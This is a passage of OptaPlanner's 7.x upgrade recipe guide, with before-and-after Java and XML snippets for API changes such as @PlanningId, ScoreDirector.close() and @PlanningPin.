scoreDirectorFactory.buildScoreDirector();\n...\nguiScoreDirector.dispose();\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom cloning: `PlanningCloneable` replaced\n\nThe interface `PlanningCloneable` has been removed,\nuse a `SolutionCloner` instead.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class NQueens implements PlanningCloneable<NQueens> {\n ...\n\n public NQueens planningClone() {\n ...\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class NQueensSolutionCloner implements SolutionCloner<NQueens> {\n\n @Override\n public NQueens cloneSolution(CloneLedger ledger, NQueens original) {\n ...\n }\n\n}\n----\n\n[source, java]\n----\n@PlanningSolution(solutionCloner = NQueensSolutionCloner.class)\npublic class NQueens {\n ...\n}\n----\n\n\n== From 7.0.0.Beta3 to 7.0.0.Beta4\n\n[.upgrade-recipe-recommended]\n=== Add `@PlanningId` annotation\n\nIt is recommended to add a `@PlanningId` annotation\non the unique ID of every planning entity and on most problem fact classes\n(especially on each class that is a planning value class).\nThe ID must never be null and must be unique per class (no need to be globally unique).\n\nThis enables the use of multithreaded solvers (such as Partitioned Search)\nand makes it easier to implement a real-time planning `ProblemFactChange` by using `ScoreDirector.lookUpWorkingObject()`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic abstract class AbstractPersistable ... {\n\n protected Long id; \/\/ Can also be a String, Integer, ...\n\n public Long getId() {\n return id;\n }\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic abstract class AbstractPersistable ... {\n\n protected Long id; \/\/ Can also be a String, Integer, ...\n\n @PlanningId\n public Long getId() {\n return id;\n }\n\n ...\n}\n----\n\nYou can also put the `@PlanningId` annotation on the field instead.\n\n\n[.upgrade-recipe-minor]\n=== `ProblemFactChange`: Use `lookUpWorkingObject()`\n\nUse the new method `ScoreDirector.lookUpWorkingObject(Object)` to translate a planning entity or problem fact\nto its working instance planning clone more efficiently.\n\nThis requires that the class has a `@PlanningId` annotation on one of its getters or fields.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class EditComputerProblemFactChange implements ProblemFactChange<CloudBalance> {\n\n private final CloudComputer changedComputer;\n ...\n\n public void doChange(ScoreDirector<CloudBalance> scoreDirector) {\n CloudComputer workingComputer = null;\n for (CloudComputer computer : cloudBalance.getComputerList()) {\n if (changedComputer.getId().equals(computer.getId())) {\n workingComputer = computer;\n break;\n }\n }\n\n scoreDirector.beforeProblemPropertyChanged(workingComputer);\n workingComputer.setCpuPower(changedComputer.getCpuPower());\n scoreDirector.afterProblemPropertyChanged(workingComputer);\n ...\n scoreDirector.triggerVariableListeners();\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class EditComputerProblemFactChange implements ProblemFactChange<CloudBalance> {\n\n private final CloudComputer changedComputer;\n ...\n\n public void doChange(ScoreDirector<CloudBalance> scoreDirector) {\n CloudComputer workingComputer = scoreDirector.lookUpWorkingObject(changedComputer);\n\n scoreDirector.beforeProblemPropertyChanged(workingComputer);\n workingComputer.setCpuPower(changedComputer.getCpuPower());\n scoreDirector.afterProblemPropertyChanged(workingComputer);\n ...\n scoreDirector.triggerVariableListeners();\n }\n\n}\n----\n\n\n== From 7.0.0.Beta5 to 7.0.0.Beta6\n\n[.upgrade-recipe-minor]\n=== Benchmarker warms up by default\n\nIt is no longer needed to explicitly configure a warm up time for the benchmarks.\nIt now warms up for 30 seconds by default.\n\nBefore in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n<plannerBenchmark>\n ...\n <warmUpSecondsSpentLimit>30<\/warmUpSecondsSpentLimit>\n ...\n<\/plannerBenchmark>\n----\n\nAfter in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n<plannerBenchmark>\n ...\n<\/plannerBenchmark>\n----\n\nTo disable the warm up, explicitly set it to 0:\n[source, xml]\n----\n<plannerBenchmark>\n ...\n <warmUpSecondsSpentLimit>0<\/warmUpSecondsSpentLimit>\n ...\n<\/plannerBenchmark>\n----\n\n\n[.upgrade-recipe-minor]\n=== `CustomPhaseCommand`: method `applyCustomProperties()` replaced\n\nThe `CustomPhaseCommand` no longer has the method `applyCustomProperties()`.\nIf you have custom properties in your solver configuration,\nsimply implement a public setter for each custom property.\nThe supported types for a setter currently include booleans, numbers and string.\n\nSimilar custom properties support is available on some other custom classes (such as `SolutionPartitioner`).\n\nBefore in `*.java`:\n[source, java]\n----\npublic class MyCustomPhaseCommand extends AbstractCustomPhaseCommand {\n\n private int mySelectionSize;\n\n @Override\n public void applyCustomProperties(Map<String, String> customPropertyMap) {\n String mySelectionSizeString = customPropertyMap.get(\"mySelectionSize\");\n try {\n mySelectionSize = mySelectionSizeString == null ? 10 : Integer.parseInt(mySelectionSizeString);\n } catch (NumberFormatException e) {\n throw new IllegalArgumentException(\"The mySelectionSize (\" + mySelectionSizeString + \") cannot be parsed.\", e);\n }\n ...\n }\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class MyCustomPhaseCommand extends AbstractCustomPhaseCommand {\n\n private int mySelectionSize = 10;\n\n @SuppressWarnings(\"unused\")\n public void setMySelectionSize(int mySelectionSize) {\n this.mySelectionSize = mySelectionSize;\n }\n\n ...\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `Bendable*Score`: method `isFeasible()` fixed\n\nA bendable score with at least 2 hard score levels is now infeasible\nif any of those hard levels is negative, even if one of them is positive (1 or higher).\n\n\n[.upgrade-recipe-minor]\n=== `EasyScoreCalculator`: `calculateScore()` reverted to 6.x style\n\n*This change reverts a change of 7.0.0.Beta1. Ignore this item if you're upgrading directly from version 6.*\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalancingEasyScoreCalculator implements EasyScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(CloudBalance cloudBalance, int initScore) {\n ...\n return HardSoftScore.valueOf(initScore, hardScore, softScore);\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalancingEasyScoreCalculator implements EasyScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(CloudBalance cloudBalance) {\n ...\n return HardSoftScore.valueOf(hardScore, softScore);\n }\n\n}\n----\n\nOptaPlanner still keeps track of the `initScore` internally.\n\n\n[.upgrade-recipe-minor]\n=== `IncrementalScoreCalculator`: `calculateScore()` reverted to 6.x style\n\n*This change reverts a change of 7.0.0.Beta1. Ignore this item if you're upgrading directly from version 6.*\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudBalancingIncrementalScoreCalculator extends AbstractIncrementalScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore(int initScore) {\n return HardSoftScore.valueOf(initScore, hardScore, softScore);\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudBalancingIncrementalScoreCalculator extends AbstractIncrementalScoreCalculator<CloudBalance> {\n\n public HardSoftScore calculateScore() {\n return HardSoftScore.valueOf(hardScore, softScore);\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `Score`: `valueOf(...)` and `valueOfInitialized(...)` reverted to 6.x style\n\n*This change reverts a change of 7.0.0.Beta1. Ignore this item if you're upgrading directly from version 6.*\n\nBefore in `*.java`:\n[source, java]\n----\n SimpleScore score = SimpleScore.valueOfInitialized(1234);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n SimpleScore score = SimpleScore.valueOf(1234);\n----\n\nOr with a `HardSoftScore`:\n\nBefore in `*.java`:\n[source, java]\n----\n HardSoftScore score = HardSoftScore.valueOfInitialized(1200, 34);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n HardSoftScore score = HardSoftScore.valueOf(1200, 34);\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom initializer: `Score.compareTo()` behaviour reverted to 6.x style\n\n*This change reverts a change of 7.0.0.Beta1. Ignore this item if you're upgrading directly from version 6.*\n\nBefore in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n ...\n\n private void initializeSeatDesignationList(ScoreDirector<DinnerParty> scoreDirector, DinnerParty dinnerParty) {\n ...\n for (SeatDesignation seatDesignation : dinnerParty.getSeatDesignationList()) {\n Score bestScore = SimpleScore.valueOfInitialized(Integer.MIN_VALUE);\n ...\n for (Seat seat : undesignatedSeatList) {\n ...\n if (score.toInitializedScore().compareTo(bestScore.toInitializedScore()) > 0) {\n bestScore = score;\n ...\n }\n }\n ...\n }\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class DinnerPartySolutionInitializer extends AbstractCustomPhaseCommand<DinnerParty> {\n ...\n\n private void initializeSeatDesignationList(ScoreDirector<DinnerParty> scoreDirector, DinnerParty dinnerParty) {\n ...\n for (SeatDesignation seatDesignation : dinnerParty.getSeatDesignationList()) {\n Score bestScore = SimpleScore.valueOf(Integer.MIN_VALUE);\n ...\n for (Seat seat : undesignatedSeatList) {\n ...\n if (score.compareTo(bestScore) > 0) {\n bestScore = score;\n ...\n }\n }\n ...\n }\n }\n\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom `Move`: added optional generic type parameter\n\nTo avoid the awkward cast to your `Solution` implementation,\n`Move` and `AbstractMove` now optionally support a generic type parameter (which is the solution class).\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudComputerChangeMove extends AbstractMove {\n\n @Override\n public boolean isMoveDoable(ScoreDirector scoreDirector) {\n return !Objects.equals(cloudProcess.getComputer(), toCloudComputer);\n }\n\n @Override\n public Move createUndoMove(ScoreDirector scoreDirector) {\n return new CloudComputerChangeMove(cloudProcess, cloudProcess.getComputer());\n }\n\n @Override\n protected void doMoveOnGenuineVariables(ScoreDirector scoreDirector) {\n scoreDirector.beforeVariableChanged(cloudProcess, \"computer\");\n cloudProcess.setComputer(toCloudComputer);\n scoreDirector.afterVariableChanged(cloudProcess, \"computer\");\n }\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CloudComputerChangeMove extends AbstractMove<CloudBalance> {\n\n @Override\n public boolean isMoveDoable(ScoreDirector<CloudBalance> scoreDirector) {\n return !Objects.equals(cloudProcess.getComputer(), toCloudComputer);\n }\n\n @Override\n public CloudComputerChangeMove createUndoMove(ScoreDirector<CloudBalance> scoreDirector) {\n return new CloudComputerChangeMove(cloudProcess, cloudProcess.getComputer());\n }\n\n @Override\n protected void doMoveOnGenuineVariables(ScoreDirector<CloudBalance> scoreDirector) {\n scoreDirector.beforeVariableChanged(cloudProcess, \"computer\");\n cloudProcess.setComputer(toCloudComputer);\n scoreDirector.afterVariableChanged(cloudProcess, \"computer\");\n }\n\n ...\n}\n----\n\n\n== From 7.0.0.Beta6 to 7.0.0.Beta7\n\n[.upgrade-recipe-major.upgrade-recipe-public-api]\n=== `ConstraintMatch(Total)`: `getWeightTotal()` and `getWeight()` replaced\n\nWhen explaining a score through `ScoreDirector.getConstraintMatchTotals()`,\nthe `ConstraintMatchTotal` and `ConstraintMatch` instances now have a `Score`\ninstead of an `int scoreLevel` and a `Number weight`.\n\nThis simplifies the API and allows the reuse of `ConstraintMatch` in the indictment API.\n\nBefore in `*.java`:\n[source, java]\n----\n for (ConstraintMatchTotal constraintMatchTotal : guiScoreDirector.getConstraintMatchTotals()) {\n int scoreLevel = constraintMatchTotal.getScoreLevel();\n Integer weightTotal = (Integer) constraintMatchTotal.getWeightTotalAsNumber();\n String text = weightTotal.toString() + (scoreLevel == 0 ? \"hard\" : \"soft\");\n ...\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n for (ConstraintMatchTotal constraintMatchTotal : guiScoreDirector.getConstraintMatchTotals()) {\n HardSoftScore scoreTotal = (HardSoftScore) constraintMatchTotal.getScoreTotal();\n String text = scoreTotal.toShortString();\n ...\n }\n----\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== `ConstraintMatchAwareIncrementalScoreCalculator`: `getConstraintMatchTotals()` impact\n\nWhen implementing the interface `ConstraintMatchAwareIncrementalScoreCalculator`'s method `getConstraintMatchTotals()`,\nthe constructor of `ConstraintMatchTotal` and the method `addConstraintMatch(...)`\nnow use `Score` instances instead of numbers.\n\nBefore in `*.java`:\n[source, java]\n----\n public Collection<ConstraintMatchTotal> getConstraintMatchTotals() {\n LongConstraintMatchTotal maximumCapacityMatchTotal = new LongConstraintMatchTotal(\n CONSTRAINT_PACKAGE, \"maximumCapacity\", 0);\n ...\n serviceLocationSpreadMatchTotal.addConstraintMatch(\n ..., - weight);\n ...\n }\n----\n\nAfter in `*.java`:\n[source, java]\n----\n public Collection<ConstraintMatchTotal> getConstraintMatchTotals() {\n ConstraintMatchTotal maximumCapacityMatchTotal = new ConstraintMatchTotal(\n CONSTRAINT_PACKAGE, \"maximumCapacity\", HardSoftLongScore.ZERO);\n ...\n serviceLocationSpreadMatchTotal.addConstraintMatch(\n ..., HardSoftLongScore.valueOf(- weight, 0));\n ...\n }\n----\n\n\n[.upgrade-recipe-minor.upgrade-recipe-public-api]\n=== Score rule that changes 2 score levels: call `addMultiConstraintMatch()`\n\nA score rule that changes 2 score levels in its RHS,\nmust now call `addMultiConstraintMatch()` instead of 2 separate `add*ConstraintMatch()` calls.\n\nBefore in `*.drl`:\n[source, drl]\n----\nrule \"Costly and unfair\"\nwhen\n \/\/ Complex pattern\nthen\n scoreHolder.addMediumConstraintMatch(kcontext, -3); \/\/ Financial cost\n scoreHolder.addSoftConstraintMatch(kcontext, -4); \/\/ Employee happiness cost\nend\n----\n\nAfter in `*.drl`:\n[source, drl]\n----\nrule \"Costly and unfair\"\nwhen\n \/\/ Complex pattern\nthen\n scoreHolder.addMultiConstraintMatch(kcontext, 0, -3, -4);\nend\n----\n\nWhen calling `guiScoreDirector.getConstraintMatchTotals()`,\nthere is now also only one `ConstraintMatchTotal` instance for this score rule\nand only one `ConstraintMatch` instance per fired rule.\n\n\n[.upgrade-recipe-minor]\n=== Custom `Score`: `toShortString()` added\n\nIf you have a custom `ScoreDefinition`: the `Score` interface has another new method `toShortString()`.\n\nAfter in `*.java`:\n[source, java]\n----\npublic final class HardSoftScore extends AbstractScore<HardSoftScore> ... {\n ...\n @Override\n public String toShortString() {\n return buildShortString((n) -> ((Integer) n).intValue() != 0, HARD_LABEL, SOFT_LABEL);\n }\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== `Move`: `createUndoMove()` and `doMove()` changed\n\nThe `Move` interface has changed: `doMove()` now returns the undo move, so `createUndoMove()` has been removed.\nThis was needed to fix a bug in `CompositeMove`.\nHowever, `AbstractMove` completely deals with this change, so *your custom move implementation stays the same*.\n\nIn the very rare case that you're actually calling `createUndoMove()` yourself,\nuse the return type of `doMove()` instead.\n\nBefore in `*.java`:\n[source, java]\n----\n Move<Solution_> move = ...;\n Move<Solution_> undoMove = move.createUndoMove(scoreDirector);\n move.doMove(scoreDirector);\n----\n\nAfter in `*.java`:\n[source, java]\n----\n Move<Solution_> move = ...;\n Move<Solution_> undoMove = move.doMove(scoreDirector);\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom `ScoreDefinition`: `getZeroScore()` added\n\nIf you have a custom `ScoreDefinition`: the `ScoreDefinition` interface has another new method `getZeroScore()`.\n\nAfter in `*.java`:\n[source, java]\n----\npublic class HardSoftScoreDefinition extends AbstractFeasibilityScoreDefinition<HardSoftScore> {\n ...\n\n @Override\n public HardSoftScore getZeroScore() {\n return HardSoftScore.ZERO;\n }\n}\n----\n\n\n== From 7.0.0.Beta7 to 7.0.0.CR1\n\n[.upgrade-recipe-minor]\n=== `ConstraintMatchAwareIncrementalScoreCalculator`: `getIndictmentMap()` added\n\nIf you're using a Java incremental score calculator that is also `ConstraintMatch` aware,\nit now needs to also implement the method `getIndictmentMap()`.\nSimply `return null` to have it calculated automatically from the return value of `getConstraintMatchTotals()`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class MachineReassignmentIncrementalScoreCalculator\n implements ConstraintMatchAwareIncrementalScoreCalculator<MachineReassignment> {\n\n ...\n\n @Override\n public Collection<ConstraintMatchTotal> getConstraintMatchTotals() {\n ...\n }\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class MachineReassignmentIncrementalScoreCalculator\n implements ConstraintMatchAwareIncrementalScoreCalculator<MachineReassignment> {\n\n ...\n\n @Override\n public Collection<ConstraintMatchTotal> getConstraintMatchTotals() {\n ...\n }\n\n @Override\n public Map<Object, Indictment> getIndictmentMap() {\n return null; \/\/ Calculate it non-incrementally from getConstraintMatchTotals()\n }\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== Custom `MoveListFactory` and `MoveIteratorFactory`: method return `Move<Solution_>`\n\nThe `MoveListFactory` and `MoveIteratorFactory`'s methods now use `Move<Solution_>` instead of a raw-typed `Move`.\nThis way your `MoveListFactory` can return `List<ChangeMove<MySolution>>` instead of `List<ChangeMove>`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CloudComputerChangeMoveFactory implements MoveListFactory<CloudBalance> {\n\n @Override\n public List<Move> createMoveList(CloudBalance solution) {\n ...\n }\n\n}\n----\n\nAfter in `*.java` (if it creates generic `ChangeMove` instances):\n[source, java]\n----\npublic class CloudComputerChangeMoveFactory implements MoveListFactory<CloudBalance> {\n\n @Override\n public List<ChangeMove<CloudBalance>> createMoveList(CloudBalance nQueens) {\n ...\n }\n\n}\n----\n\nAfter in `*.java` (if it creates `CloudComputerChangeMove` instances and that implements `Move<CloudBalance>`):\n\n[source, java]\n----\npublic class RowChangeMoveFactory implements MoveListFactory<CloudBalance> {\n\n @Override\n public List<CloudComputerChangeMove> createMoveList(CloudBalance nQueens) {\n ...\n }\n\n}\n----\n\nBefore in `*.java`:\n[source, java]\n----\npublic class CheapTimePillarSlideMoveIteratorFactory implements MoveIteratorFactory<CheapTimeSolution> {\n\n public Iterator<Move> createOriginalMoveIterator(...) {...}\n public Iterator<Move> createRandomMoveIterator(...) {...}\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class CheapTimePillarSlideMoveIteratorFactory implements MoveIteratorFactory<CheapTimeSolution> {\n\n public Iterator<CheapTimePillarSlideMove> createOriginalMoveIterator(...) {...}\n public Iterator<CheapTimePillarSlideMove> createRandomMoveIterator(...) {...}\n\n}\n----\n\n\n== From 7.0.0.CR3 to 7.0.0.Final\n\n[.upgrade-recipe-impl-detail]\n=== Workbench's `AbstractSolution` deprecated\n\nThe implementation class `AbstractSolution`, used only by workbench 6,\nhas been deprecated and replaced by the `autoDiscoverMemberType` feature.\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningSolution\npublic class Mysolution extends AbstractSolution<HardSoftScore> {\n\n private List<FooFact> fooFactList;\n private List<BarFact> barFactList;\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningSolution(autoDiscoverMemberType = AutoDiscoverMemberType.FIELD)\npublic class Mysolution {\n\n private List<FooFact> fooFactList;\n private List<BarFact> barFactList;\n\n private HardSoftScore score;\n\n ...\n}\n----\n\n\n== From 7.1.0.Beta2 to 7.1.0.Beta3\n\n[.upgrade-recipe-minor]\n=== `<valueSelector>`: `variableName` is now an attribute\n\nWhen power tweaking move selectors, such as `<changeMoveSelector>`,\nin a use case with multiple planning variables,\nthe `<variableName>` XML element has been replaced by a `variableName=\"...\"` XML attribute.\nThis reduces the solver configuration verbosity.\nFor backwards compatibility, the old way is still supported in the 7.x series.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <valueSelector>\n <variableName>room<\/variableName>\n <\/valueSelector>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <valueSelector variableName=\"room\"\/>\n----\n\n[.upgrade-recipe-minor]\n=== Construction Heuristic: multiple variable power tweaking simplified\n\nIt's now easier to configure construction heuristics that scale better for multiple variables,\nbut assigning one variable at a time.\n\nBefore in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <constructionHeuristic>\n <queuedEntityPlacer>\n <entitySelector id=\"placerEntitySelector\"\/>\n <changeMoveSelector>\n <entitySelector mimicSelectorRef=\"placerEntitySelector\"\/>\n <valueSelector variableName=\"period\"\/>\n <\/changeMoveSelector>\n <changeMoveSelector>\n <entitySelector mimicSelectorRef=\"placerEntitySelector\"\/>\n <valueSelector variableName=\"room\"\/>\n <\/changeMoveSelector>\n <\/queuedEntityPlacer>\n <\/constructionHeuristic>\n----\n\nAfter in `*SolverConfig.xml` and `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <constructionHeuristic>\n <constructionHeuristicType>FIRST_FIT<\/constructionHeuristicType>\n <changeMoveSelector>\n <valueSelector variableName=\"period\"\/>\n <\/changeMoveSelector>\n <changeMoveSelector>\n <valueSelector variableName=\"room\"\/>\n <\/changeMoveSelector>\n <\/constructionHeuristic>\n----\n\n\n== From 7.1.0.Final to 7.2.0.Final\n\nThere is no impact on your code.\n\n\n== From 7.2.0.Final to 7.3.0.Final\n\n[.upgrade-recipe-minor]\n=== `SolutionFileIO`: `getOutputFileExtension()` is now defaulted\n\nIt's no longer needed to implement `getOutputFileExtension()` of the `SolutionFileIO` interface\nif it returns the same as `getInputFileExtension()`.\n\nBefore in `*.java`:\n[source, java]\n----\npublic class VehicleRoutingFileIO implements SolutionFileIO<VehicleRoutingSolution> {\n\n @Override\n public String getInputFileExtension() {\n return \"vrp\";\n }\n\n @Override\n public String getOutputFileExtension() {\n return \"vrp\";\n }\n\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\npublic class VehicleRoutingFileIO implements SolutionFileIO<VehicleRoutingSolution> {\n\n @Override\n public String getInputFileExtension() {\n return \"vrp\";\n }\n\n ...\n}\n----\n\n[.upgrade-recipe-minor]\n=== Benchmarker: direct POJO input\n\nThe benchmarker now also accepts problem instances directly, without reading them from disk.\nIf you're generating your problems or fetching them from a database,\nit might be interesting to switch to this approach (otherwise stick with the old approach because it works offline).\n\nBefore in `*.java`:\n[source, java]\n----\n CloudBalance problem1 = readFromDatabase(...);\n CloudBalance problem2 = readFromDatabase(...);\n ...\n CloudBalanceFileIO solutionFileIO = new CloudBalanceFileIO();\n solutionFileIO.write(problem1, new File(\"tmp\/problem1.xml\"));\n solutionFileIO.write(problem2, new File(\"tmp\/problem1.xml\"));\n ...\n PlannerBenchmark plannerBenchmark = benchmarkFactory.buildPlannerBenchmark();\n plannerBenchmark.benchmark();\n----\n\nBefore in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n <solutionFileIOClass>...CloudBalanceFileIO<\/solutionFileIOClass>\n <inputSolutionFile>tmp\/problem1.xml<\/inputSolutionFile>\n <inputSolutionFile>tmp\/problem2.xml<\/inputSolutionFile>\n ...\n <\/problemBenchmarks>\n----\n\nAfter in `*.java`:\n[source, java]\n----\n CloudBalance problem1 = readFromDatabase(...);\n CloudBalance problem2 = readFromDatabase(...);\n ...\n PlannerBenchmark plannerBenchmark = benchmarkFactory.buildPlannerBenchmark(problem1, problem2, ...);\n plannerBenchmark.benchmark();\n----\n\nAfter in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n <\/problemBenchmarks>\n----\n\n[.upgrade-recipe-minor]\n=== Benchmarker: `BEST_SCORE` statistic by default\n\nThe benchmarker now includes the `BEST_SCORE` statistic by default.\nIt no longer needs to be explicitly configured.\n\nBefore in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n ...\n <problemStatisticType>BEST_SCORE<\/problemStatisticType>\n <\/problemBenchmarks>\n----\n\nAfter in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n ...\n <\/problemBenchmarks>\n----\n\nTo disable the `BEST_SCORE` statistic, use `<problemStatisticEnabled>` in `*BenchmarkConfig.xml`:\n[source, xml]\n----\n <problemBenchmarks>\n ...\n <problemStatisticEnabled>false<\/problemStatisticEnabled>\n <\/problemBenchmarks>\n----\n\n[.upgrade-recipe-major]\n=== `ScoreDirector`: `dispose()` replaced by `close()`\n\n`ScoreDirector` now implements `AutoCloseable`,\nso the `dispose()` method has been deprecated and replaced by `close()`.\n\nBefore in `*.java`:\n[source, java]\n----\n ScoreDirector<VehicleRoutingSolution> scoreDirector = scoreDirectorFactory.buildScoreDirector();\n ...\n scoreDirector.dispose();\n----\n\nAfter in `*.java`:\n[source, java]\n----\n ScoreDirector<VehicleRoutingSolution> scoreDirector = scoreDirectorFactory.buildScoreDirector();\n ...\n scoreDirector.close();\n----\n\nAfter in `*.java` (with ARM usage):\n[source, java]\n----\n try (ScoreDirector<VehicleRoutingSolution> scoreDirector = scoreDirectorFactory.buildScoreDirector()) {\n ...\n }\n----\n\n\n== From 7.3.0.Final to 7.4.0.Final\n\n[.upgrade-recipe-minor]\n=== `movableEntitySelectionFilter` is now inherited\n\nAn entity's `movableEntitySelectionFilter` is now inherited by child entities.\nThe workaround of configuring the filter twice, is now obsolete.\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningEntity(movableEntitySelectionFilter = ParentFilter.class)\npublic class Animal {\n ...\n}\n\n@PlanningEntity(movableEntitySelectionFilter = ParentFilter.class)\npublic class Dog extends Animal {\n ...\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningEntity(movableEntitySelectionFilter = ParentFilter.class)\npublic class Animal {\n ...\n}\n\n@PlanningEntity()\npublic class Dog extends Animal {\n ...\n}\n----\n\n\n== From 7.4.0.Final to 7.5.0.Final\n\n[.upgrade-recipe-minor]\n=== `Indictment`: natural comparison changed\n\nAn `Indictment` is now naturally sorted by its justification.\nTo sort it based on its score, use `IndictmentScoreTotalComparator`.\n\nBefore in `*.java`:\n[source, java]\n----\nCollections.sort(indictmentList);\n----\n\nAfter in `*.java`:\n[source, java]\n----\nCollections.sort(indictmentList, new IndictmentScoreTotalComparator());\n----\n\n\n== From 7.5.0.Final to 7.6.0.Final\n\n[.upgrade-recipe-minor]\n=== `PlannerBenchmark`: new method `benchmarkAndShowReportInBrowser()`\n\nIf you're running local benchmarks, this new method will save time by opening the report automatically.\n\nBefore in `*.java`:\n[source, java]\n----\nplannerBenchmark.benchmark();\n\/\/ Afterwards manually find the benchmark dir to open the report\n----\n\nAfter in `*.java`:\n[source, java]\n----\nplannerBenchmark.benchmarkAndShowReportInBrowser();\n----\n\n[.upgrade-recipe-minor]\n=== `ConstraintMatchAwareIncrementalScoreCalculator`: `Indictment.addConstraintMatch()` changed\n\nThis only applies if you're extending `ConstraintMatchAwareIncrementalScoreCalculator`\nand you do not simply return `null` in `getIndictmentMap()`.\n\nThe method `Indictment.addConstraintMatch(ConstraintMatch)` now returns void instead of a boolean.\nIf the same `ConstraintMatch` is added twice, it now fails fast instead of returning false.\nIf the same `ConstraintMatch` has the same justification twice,\nit must now be added to that justification's `Indictment` only once.\n\n\n== From 7.6.0.Final to 7.7.0.Final\n\n[.upgrade-recipe-major]\n=== Replace `movableEntitySelectionFilter` with `@PlanningPin` when possible\n\nIn many cases, the complex use of a `movableEntitySelectionFilter` to pin down planning entities\ncan by simplified by a `@PlanningPin` annotation on a field or method\nthat returns true if the entity is immovable.\n\nBefore in `*.java`:\n[source, java]\n----\n@PlanningEntity(movableEntitySelectionFilter = MovableLectureSelectionFilter.class)\npublic class Lecture {\n private boolean pinned;\n\n public boolean isPinned() {\n return pinned;\n }\n}\n----\n\n[source, java]\n----\npublic class MovableLectureSelectionFilter implements SelectionFilter<CourseSchedule, Lecture> {\n\n @Override\n public boolean accept(ScoreDirector<CourseSchedule> scoreDirector, Lecture lecture) {\n return !lecture.isPinned();\n }\n\n}\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@PlanningEntity\npublic class Lecture {\n private boolean pinned;\n\n @PlanningPin\n public boolean isPinned() {\n return pinned;\n }\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== Jackson integration: use `OptaPlannerJacksonModule`\n\nInstead of using `@JsonSerialize` and `@JsonDeserialize` Jackson annotations on every `Score` field,\njust register `OptaPlannerJacksonModule` once instead.\n\nBefore in `*.java`:\n\n[source, java]\n----\n ObjectMapper objectMapper = new ObjectMapper();\n----\n\n[source, java]\n----\n@PlanningSolution\npublic class MySolution {\n\n @JsonSerialize(using = ScoreJacksonJsonSerializer.class)\n @JsonDeserialize(using = HardSoftScoreJacksonJsonDeserializer.class)\n private HardSoftScore score;\n\n ...\n}\n----\n\nAfter in `*.java`:\n\n[source, java]\n----\n ObjectMapper objectMapper = new ObjectMapper();\n objectMapper.registerModule(OptaPlannerJacksonModule.createModule());\n----\n\n[source, java]\n----\n@PlanningSolution\npublic class MySolution {\n\n private HardSoftScore score;\n\n ...\n}\n----\n\n\n[.upgrade-recipe-minor]\n=== Jackson integration: replace `ScoreJacksonJsonSerializer`\n\nIf you do prefer to use `@JsonSerialize` and `@JsonDeserialize` Jackson annotations,\ninstead of registering `OptaPlannerJacksonModule`,\nreplace `ScoreJacksonJsonSerializer` with a specific serializer,\nsuch as `HardSoftScoreJacksonJsonSerializer`.\nThis won't affect the json output.\n\n`ScoreJacksonJsonSerializer` is deprecated.\n\nBefore in `*.java`:\n[source, java]\n----\n@JsonSerialize(using = ScoreJacksonJsonSerializer.class)\n@JsonDeserialize(using = HardSoftScoreJacksonJsonDeserializer.class)\nprivate HardSoftScore score;\n----\n\nAfter in `*.java`:\n[source, java]\n----\n@JsonSerialize(using = HardSoftScoreJacksonJsonSerializer.class)\n@JsonDeserialize(using = HardSoftScoreJacksonJsonDeserializer.class)\nprivate HardSoftScore score;\n----\n\n\n== From 7.7.0.Final to 7.8.0.Final\n\n\n[.upgrade-recipe-minor]\n=== Partitioned Search: `threadFactoryClass` moved\n\nNow that `<solver>` directly supports a 